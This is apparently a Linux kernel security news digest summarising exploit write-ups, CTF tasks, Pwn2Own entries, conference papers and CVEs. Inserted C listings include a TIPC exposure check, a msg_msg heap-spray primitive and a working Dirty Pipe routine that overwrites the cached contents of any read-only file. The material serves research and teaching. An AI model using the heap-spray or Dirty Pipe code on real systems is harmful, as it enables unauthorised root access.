Struggle with slab freelist hardening in a CTF task
Kileak described the solution of the kernel task IPS from VULNCON CTF. The researcher had a hard fight against SLAB_FREELIST_RANDOM and SLAB_FREELIST_HARDENED.
Ubuntu LPE exploit from Pwn2Own
Flatt Security published a whitepaper on exploiting a Linux kernel eBPF vulnerability that yields an out-of-bounds read/write primitive.
They used it against Ubuntu Desktop 20.10 at Pwn2Own 2021.
Nice improvement in my Linux Kernel Defence Map.
See how the Control Flow Hijack part looks now ⬆️
I'd appreciate your feedback.
Attacking Samsung RKP
An article by Alexandre Adamski about vulnerabilities in Real-time Kernel Protection (RKP), the security hypervisor of Samsung phones. Two of the bugs found allow bypassing certain RKP restrictions, and the third one allows compromising RKP itself.
The article is a follow-up to A Samsung RKP Compendium, which describes the internals of Samsung RKP.
Impalabs
Attacking Samsung RKP
This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After…
Usenix 2021
Papers on Linux kernel security presented at USENIX Security 2021 back in August:
— SyzVegas: Beating Kernel Fuzzing Odds with Reinforcement Learning [paper] [slides] [video] presented by Daimeng Wang.
— ExpRace: Exploiting Kernel Races through Raising Interrupts [paper] [slides] [video] presented by Yoochan Lee.
— SHARD: Fine-Grained Kernel Specialization with Context-Aware Hardening [paper] [slides] [video] presented by Muhammad Abubakar.
— Detecting Kernel Refcount Bugs with Two-Dimensional Consistency Checking [paper] [slides] [video] presented by Xin Tan.
— An Investigation of the Android Kernel Patch Ecosystem [paper] [slides] [video] presented by Zheng Zhang.
— Undo Workarounds for Kernel Bugs [paper] [slides] [video] presented by Seyed Mohammadjavad Seyed Talebi.
— An Analysis of Speculative Type Confusion Vulnerabilities in the Wild [paper] [slides] [video] presented by Ofek Kirzner.
CVE-2021-44733: Fuzzing and exploitation of a use-after-free in the Linux kernel TEE subsystem
An article about a bug in the Linux kernel TEE (Trusted Execution Environment) subsystem. By Patrik Lantz.
The bug was found by syzkaller; descriptions of the fuzzing setup are included in the article. An exploit that takes control of the program counter (PC) is also provided, along with instructions for reproducing it. The exploit does not bypass PAN.
GitHub
optee-qemu/README.md at main · pjlantz/optee-qemu
Environment with vulnerable kernel for exploitation of the TEE driver (CVE-2021-44733) - pjlantz/optee-qemu
Automated RE of Kernel Configurations
Brandon Miller published an article about his Binary Ninja plugin that analyzes Linux kernel binaries to recover kernel configuration options.
This tool is called bn-kconfig-recover. It can help when a kernel binary has CONFIG_IKCONFIG disabled.
Not all kconfig options are supported. Work on this tool is in progress.
Linux kernel exploit development tutorial
ChrisTheCoolHut published a GitBook tutorial about writing Linux kernel exploits along with the source code for tasks and their solutions.
breaking-bits.gitbook.io
Linux kernel exploit development | Breaking Bits
CVE-2021-45608: NetUSB RCE Flaw in Millions of End User Routers
Max Van Amerongen published an analysis of a vulnerability in the NetUSB proprietary driver, which is used in products of many network device vendors.
The researcher briefly describes the exploitation strategy but does not share many details.
SentinelOne
CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers
SentinelLabs has discovered a high severity flaw in NetUSB which could be remotely exploited to execute code in the kernel.
CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers
An article describing an exploit for a slab-out-of-bounds bug in the fsconfig syscall handler. By FizzBuzz101, @clubby789, @ryaagard, @Chronos190, @ginkoid, and @chop0_.
The authors managed to both get LPE on the Ubuntu kernel and escape the kCTF infrastructure container, and thus claim the kCTF VRP bounty.
The bug was found with syzkaller, and it was also reported by syzbot.
www.willsroot.io
CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers
Vulnerability Research on Low-Level Systems
CVE-2022-0185: Linux kernel slab out-of-bounds write: exploit and writeup
An article by @lockedbyte with another write-up for the slab-out-of-bounds bug in the fsconfig syscall handler. The exploit is attached to the oss-security post.
CVE-2022-0435: Linux Kernel Remote Stack Overflow
Samuel Page disclosed a remotely and locally reachable stack overflow in Transparent Inter-Process Communication (TIPC), the kernel's TIPC networking subsystem.
The bug has existed since kernel version 4.8. For remote exploitation, the vulnerable system must have the TIPC module loaded and a TIPC bearer enabled.
Samuel also posted a funny overview of his experience in disclosing Linux kernel vulnerabilities.
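The two preconditions above (kernel at least 4.8, tipc present) are what an administrator would check first. Here is an added C check, not code from Samuel Page's write-up, that tests both on the local machine. It assumes that /sys/module/tipc exists when tipc is loaded (a built-in tipc without module parameters may not show there) and that socket(AF_TIPC) triggers module autoload for an unprivileged user, which is exactly why the bug is locally reachable even when tipc is not yet loaded; the active probe is therefore opt-in.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/utsname.h>
#include <unistd.h>

#ifndef AF_TIPC
#define AF_TIPC 30            /* assumption: matches include/linux/socket.h */
#endif

enum tipc_state { TIPC_ABSENT = 0, TIPC_LOADED = 1, TIPC_AUTOLOADED = 2 };

/* Return 1 if a "MAJOR.MINOR..." release string is at least maj.min.
 * Distributions backport fixes, so this is only the "could be affected" side. */
static int kver_ge(const char *release, int maj, int min)
{
    int a = 0, b = 0;
    if (sscanf(release, "%d.%d", &a, &b) != 2)
        return 0;
    return a > maj || (a == maj && b >= min);
}

/* Passive check: /sys/module/tipc exists once the module is loaded
 * (assumption: tipc is not built in; built-ins without parameters have no entry). */
static int tipc_loaded(void)
{
    struct stat st;
    return stat("/sys/module/tipc", &st) == 0;
}

/* Active check, side effect included: creating an AF_TIPC socket makes the
 * kernel request_module("net-pf-30"), so this may load tipc on the spot.
 * Returns 1 if a TIPC socket could be created, 0 if the family is
 * unsupported (absent or blacklisted), -1 on any other error. */
static int tipc_probe_autoload(void)
{
    int s = socket(AF_TIPC, SOCK_RDM, 0);
    if (s >= 0) {
        close(s);
        return 1;
    }
    return errno == EAFNOSUPPORT ? 0 : -1;
}

static enum tipc_state tipc_exposure(int allow_autoload)
{
    if (tipc_loaded())
        return TIPC_LOADED;
    if (allow_autoload && tipc_probe_autoload() == 1)
        return TIPC_AUTOLOADED;
    return TIPC_ABSENT;
}

int main(int argc, char **argv)
{
    struct utsname u;
    if (uname(&u) < 0)
        return 1;
    int active = argc > 1 && strcmp(argv[1], "--autoload") == 0;
    enum tipc_state st = tipc_exposure(active);
    printf("kernel %s: %s 4.8+, tipc %s\n", u.release,
           kver_ge(u.release, 4, 8) ? "is" : "is below",
           st == TIPC_LOADED ? "loaded" :
           st == TIPC_AUTOLOADED ? "was autoloaded by this probe" : "absent");
    return 0;
}
```

Running it without arguments is harmless; `--autoload` reproduces the local trigger path and will leave tipc loaded on a host that ships the module. Bearer state is not visible from userspace without netlink, so use `tipc bearer list` from iproute2 for the remote precondition. If tipc is not needed, the usual hardening is to prevent autoload with an `install tipc /bin/false` line in a /etc/modprobe.d file.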
Zenith: Linux kernel RCE exploit for NetUSB driver
Axel Souchet published the Zenith exploit used at Pwn2Own Austin 2021.
Zenith exploits a memory corruption vulnerability in the NetUSB proprietary driver to get remote code execution on the TP-Link Archer C7 V5 router.
This router has no KASLR and an executable kernel heap (unbelievable!).
GitHub
GitHub - 0vercl0k/zenith: Zenith exploits a memory corruption vulnerability in the NetUSB driver to get remote-code execution on…
Zenith exploits a memory corruption vulnerability in the NetUSB driver to get remote-code execution on the TP-Link Archer C7 V5 router for Pwn2Own Austin 2021. - 0vercl0k/zenith
CVE-2022-0185: Exploiting a kernel heap buffer overflow for LPE
clubby789 published a detailed write-up about discovering and exploiting CVE-2022-0185 in the FS subsystem of the Linux kernel.
Exploit primitives:
▪️Kernel pointer leak and arbitrary write using msg_msg
▪️Exploiting FUSE to control the race condition
▪️Overwriting the modprobe_path for privilege escalation
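The msg_msg primitive works because msgsnd() allocates one `struct msg_msg` (header plus leading payload) from the kmalloc cache chosen by the payload size, so an attacker picks the payload to land next to the vulnerable object, and MSG_COPY lets the sender read a message back without dequeuing it. The following added C example, not code from the write-up, shows that size arithmetic and the spray/peek mechanics on a harmless queue. It assumes the x86_64 layout of 5.x kernels: a 48-byte msg_msg, an 8-byte msg_msgseg, 4096-byte pages, and the default SLUB kmalloc cache sizes.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#ifndef MSG_COPY
#define MSG_COPY 040000   /* peek without dequeuing; needs CONFIG_CHECKPOINT_RESTORE */
#endif

/* Assumed x86_64 layout: msg_msg = 48 bytes, msg_msgseg = 8 bytes, PAGE_SIZE = 4096. */
#define MSG_MSG_HDR 48
#define MSG_SEG_HDR 8
#define PAGE_SZ     4096
#define DATALEN_MSG (PAGE_SZ - MSG_MSG_HDR)  /* 4048 payload bytes inside the msg_msg */
#define DATALEN_SEG (PAGE_SZ - MSG_SEG_HDR)  /* 4088 payload bytes per msg_msgseg */

/* Smallest default SLUB kmalloc cache on x86_64 that holds `bytes`; 0 if none. */
static size_t kmalloc_cache_for(size_t bytes)
{
    static const size_t caches[] = {8, 16, 32, 64, 96, 128, 192, 256,
                                    512, 1024, 2048, 4096, 8192};
    for (size_t i = 0; i < sizeof caches / sizeof caches[0]; i++)
        if (bytes <= caches[i])
            return caches[i];
    return 0;
}

/* Cache of the first allocation msgsnd() makes (header + leading payload). */
static size_t msg_msg_cache(size_t payload)
{
    size_t first = payload > DATALEN_MSG ? DATALEN_MSG : payload;
    return kmalloc_cache_for(MSG_MSG_HDR + first);
}

/* Number of kernel objects one msgsnd() creates: the msg_msg plus segments. */
static size_t msg_msg_alloc_count(size_t payload)
{
    if (payload <= DATALEN_MSG)
        return 1;
    size_t rest = payload - DATALEN_MSG;
    return 1 + (rest + DATALEN_SEG - 1) / DATALEN_SEG;
}

struct spray_msg {
    long mtype;
    char mtext[DATALEN_MSG];
};

/* Send `count` messages of `payload` bytes into a fresh queue, i.e. allocate
 * `count` msg_msg objects in msg_msg_cache(payload). Returns messages sent,
 * or -1 if SysV queues are unavailable or the payload would need segments. */
static int spray_msg_msg(int *qid_out, size_t payload, int count)
{
    if (payload > DATALEN_MSG)
        return -1;
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0)
        return -1;
    struct spray_msg m = { .mtype = 1 };
    memset(m.mtext, 'S', sizeof m.mtext);   /* marker bytes, easy to spot in a leak */
    int sent = 0;
    while (sent < count && msgsnd(qid, &m, payload, IPC_NOWAIT) == 0)
        sent++;
    *qid_out = qid;
    return sent;
}

/* Copy message number `idx` out without dequeuing it. With a corrupted m_ts
 * this becomes the out-of-bounds read; here it just returns our marker bytes.
 * Returns bytes copied, or -1 (errno ENOSYS if MSG_COPY is not compiled in). */
static long peek_msg(int qid, long idx, void *buf, size_t len)
{
    return msgrcv(qid, buf, len, idx, MSG_COPY | IPC_NOWAIT);
}

/* Spray 64 objects into kmalloc-64, peek at the first, tear the queue down.
 * Returns 64 on success, -1 if message queues cannot be used here. */
static int run_demo(void)
{
    int qid = -1;
    int sent = spray_msg_msg(&qid, 16, 64);
    if (sent < 0)
        return -1;
    struct spray_msg out;
    long n = peek_msg(qid, 0, &out, sizeof out.mtext);
    printf("sent %d msg_msg objects into kmalloc-%zu, peek returned %ld\n",
           sent, msg_msg_cache(16), n);
    msgctl(qid, IPC_RMID, NULL);
    return sent;
}

int main(void)
{
    return run_demo() == 64 ? 0 : 1;
}
```

Payloads above 4048 bytes are split into msg_msgseg objects that land in a second cache, which is why the write-ups choose payload sizes from the target cache minus 48. The default per-queue limit (msgmnb, 16384 bytes) caps how much one queue can spray, so real exploits spread messages over several queues.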
Hack The Box
CVE-2022-0185: A Case Study
A tale on discovering a linux kernel privesc
How to simplify exploiting CVE-2021-26708 using sshd
HardenedVault published a nice write-up that describes how to simplify my PoC exploit for CVE-2021-26708 in the Linux kernel.
They discovered how to perform heap spraying in the cred_jar slab cache for privilege escalation.
The Dirty Pipe Vulnerability
An article by Max Kellermann about Dirty Pipe, a logic bug in the kernel's pipe and page cache handling that allows writing to read-only files. The provided proof-of-concept works starting from Linux kernel version 5.8, released in August 2020.
The exploit first fills and drains a pipe, which leaves the PIPE_BUF_FLAG_CAN_MERGE flag set on the pipe's now-empty buffers. It then splices a page of a read-only file into that pipe, so the pipe buffer points at the file's page cache page while still carrying the stale flag. A subsequent write() to the pipe is merged into that page, which overwrites the in-memory contents of the read-only file.
Extending the proof-of-concept provided by Max Kellermann, Blasty has published an exploit for overwriting the contents of a SUID binary and getting root privileges.
Update: Another exploit. This one overwrites /etc/passwd. By Arinerron.
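The sequence described above, as an added C example that is not Max Kellermann's proof-of-concept: it runs the three steps against a throwaway file owned by the current user and reports whether the page cache changed. It assumes F_GETPIPE_SZ reports the pipe capacity (falling back to 65536) and 4096-byte pages; on a fixed kernel the write simply lands in the pipe and the file is untouched.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Step 1: leave PIPE_BUF_FLAG_CAN_MERGE set on every slot of the pipe ring.
 * Filling the pipe allocates all pipe_buffers with the flag set; draining it
 * releases the pages but, on a vulnerable kernel, leaves the flags behind. */
static int prime_pipe(int p[2])
{
    if (pipe(p) < 0)
        return -1;
    long sz = fcntl(p[1], F_GETPIPE_SZ);
    if (sz < 0)
        sz = 65536;                        /* assumption: default pipe capacity */
    char *buf = malloc(sz);
    if (!buf)
        return -1;
    memset(buf, 'A', sz);
    for (long done = 0; done < sz; ) {     /* fill every slot */
        ssize_t n = write(p[1], buf + done, sz - done);
        if (n <= 0) { free(buf); return -1; }
        done += n;
    }
    for (long done = 0; done < sz; ) {     /* drain: slots empty but still flagged */
        ssize_t n = read(p[0], buf + done, sz - done);
        if (n <= 0) { free(buf); return -1; }
        done += n;
    }
    free(buf);
    return 0;
}

/* Steps 2 and 3: splice the byte just before `off` from the read-only fd into
 * the pipe, so the next pipe_buffer references the file's page cache page, then
 * write() the payload, which a vulnerable kernel merges into that page.
 * `off` must not be 0 and off..off+len must stay inside one page.
 * Returns 1 if the page cache now shows `data`, 0 if not, -1 on error. */
static int dirty_pipe_write(int fd, off_t off, const char *data, size_t len)
{
    int p[2];
    if (off == 0 || (off % 4096) + len > 4096)
        return -1;
    if (prime_pipe(p) < 0)
        return -1;
    loff_t spl = off - 1;
    if (splice(fd, &spl, p[1], NULL, 1, 0) != 1)
        return -1;
    if (write(p[1], data, len) != (ssize_t)len)
        return -1;
    char *chk = malloc(len);
    if (!chk)
        return -1;
    int hit = pread(fd, chk, len, off) == (ssize_t)len && memcmp(chk, data, len) == 0;
    free(chk);
    close(p[0]);
    close(p[1]);
    return hit;
}

/* Demo on a temporary file we own, reopened O_RDONLY like a real target. */
static int run_demo(void)
{
    char path[] = "/tmp/dirtypipe-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) {
        strcpy(path, "./dirtypipe-XXXXXX");
        fd = mkstemp(path);
        if (fd < 0)
            return -1;
    }
    const char original[] = "Hello, world!\n";
    if (write(fd, original, sizeof original - 1) != (ssize_t)(sizeof original - 1)) {
        close(fd); unlink(path); return -1;
    }
    close(fd);
    fd = open(path, O_RDONLY);
    unlink(path);
    if (fd < 0)
        return -1;
    int r = dirty_pipe_write(fd, 1, "DIRTY", 5);
    close(fd);
    printf("kernel %s: read-only file %s\n",
           r == 1 ? "vulnerable" : r == 0 ? "fixed" : "error",
           r == 1 ? "modified in page cache" : "unchanged");
    return r;
}

int main(void)
{
    return run_demo() < 0;
}
```

The overwrite does not mark the page dirty, so it lives only in the page cache until the page is evicted; that is enough for the SUID and /etc/passwd exploits mentioned above, because the next exec or read goes through the cache. The same constraints apply to those exploits: the target offset cannot be at a page boundary and the payload cannot cross one.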
Exploiting CVE-2021-41073 in io_uring
Valentina Palmiotti published an excellent write-up about exploiting a type confusion in io_uring to gain root privileges.
This bug allows freeing arbitrary slab allocations from the kmalloc-32 cache.
Valentina described how she constructed these exploit primitives:
✔️ UAF in kmalloc-32
✔️ Kernel heap info-leak
✔️ Control flow hijacking
✔️ Illegal privilege escalation
The researcher also described her experience with responsible disclosure.
Compilers: The Old New Security Frontier
Brad Spengler published the slides from his talk at BlueHat IL 2022.
He gave an overview of open problems in operating system security and described how compiler plugins could help.
The Discovery and Exploitation of CVE-2022-25636
Nick Gregory published an article about exploiting a heap out-of-bounds write in netfilter. The researcher managed to hijack the kernel control flow.
nickgregory.me
The Discovery and Exploitation of CVE-2022-25636 · Nick Gregory
Security research, programming, and more.
Racing against the clock — hitting a tiny kernel race window
An article by Jann Horn on using hardware timers to widen race condition windows.
Jann applied his method to a race condition in the garbage collector for unix sockets, which had a race window of only 12 instructions.
The article also contains Jann's investigation of the precision of hardware timers in Intel CPUs.
projectzero.google
Racing against the clock -- hitting a tiny kernel race window - Project Zero
TL;DR: How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT: use a cache miss to widen the race window a little bit...